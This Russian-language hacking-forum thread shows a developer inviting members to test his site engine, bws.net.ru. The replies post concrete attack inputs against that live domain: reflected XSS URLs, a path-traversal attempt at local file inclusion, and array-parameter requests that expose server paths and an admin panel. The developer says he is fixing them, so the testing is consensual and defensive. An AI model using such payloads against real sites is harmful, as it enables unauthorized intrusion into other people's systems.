ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

bws.net.ru
  #1  
Старый 03.07.2009, 15:40
Аватар для DECIDE
DECIDE
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624

Репутация: 1
Lightbulb bws.net.ru

Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.

нужно проверить на уязвимости
 
Ответить с цитированием

  #2  
Старый 04.07.2009, 10:59
Аватар для Adm1n4eG
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962

Репутация: 39
По умолчанию

http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script>
http://bws.net.ru/?nvg=crline:application"><script>alert()</script>

Последний раз редактировалось Adm1n4eG; 04.07.2009 в 11:33..
 
Ответить с цитированием

  #3  
Старый 05.07.2009, 21:21
Аватар для DECIDE
DECIDE
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624

Репутация: 1
По умолчанию

спасибо, будет исправлено
 
Ответить с цитированием

  #4  
Старый 06.07.2009, 06:30
Аватар для Alexandr II
Alexandr II
Постоянный
Регистрация: 28.12.2007
Сообщений: 804
Провел на форуме:
4861890

Репутация: 1400


Отправить сообщение для Alexandr II с помощью ICQ
По умолчанию

PHP код:
http://www.bws.net.ru/?nvg=office:payment"><script>alert()</script> 
их тут куча) + смотри
PHP код:
http://www.bws.net.ru/?nvg="><script>alert()</script> 
админка вылазиет))) с какого боку?))
 
Ответить с цитированием

  #5  
Старый 06.07.2009, 08:51
Аватар для DECIDE
DECIDE
Новичок
Регистрация: 16.06.2009
Сообщений: 25
Провел на форуме:
26624

Репутация: 1
По умолчанию

их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал..
 
Ответить с цитированием

  #6  
Старый 31.12.2009, 17:40
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index

Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d
 
Ответить с цитированием

  #7  
Старый 31.12.2009, 17:45
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

PHP код:
POST http://bws.net.ru/?com=subscription&cmd=add HTTP/1.0
Hostbws.net.ru
UserAgent
Opera/9.60 (Windows NT 5.1UenPresto/2.1.1
Accept
text/htmlapplication/xml;q=0.9application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 17

eml[1]=loc@root.com 

результат:
Warning: preg_match() expects parameter 2 to be string, array given in [path]
 
Ответить с цитированием

  #8  
Старый 31.12.2009, 19:34
Аватар для .Life
.Life
Banned
Регистрация: 26.12.2009
Сообщений: 152
Провел на форуме:
86338

Репутация: 0
По умолчанию

вроде все теперь крикрыл, норм теперь...
но это конешно жеть было...
http://www.bws.net.ru/?nvg="><script>alert()</script>
 
Ответить с цитированием

  #9  
Старый 01.01.2010, 05:41
Аватар для Belov
Belov
Познающий
Регистрация: 04.08.2008
Сообщений: 78
Провел на форуме:
355598

Репутация: 7
Отправить сообщение для Belov с помощью ICQ
По умолчанию

http://bws.net.ru/?com=%3C раскрытие путей
 
Ответить с цитированием

  #10  
Старый 05.01.2010, 16:01
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

PHP код:
<select name="nskn[]" onchange=document.getElementById('fskn').submit()><option value="original" selected>original</select
Пути

PHP код:
http://bws.net.ru/?nvg[]=invest 
В меню вход в админку

PHP код:
http://bws.net.ru/?com[]=subscription 
Пути

Последний раз редактировалось Byrger; 05.01.2010 в 16:04..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ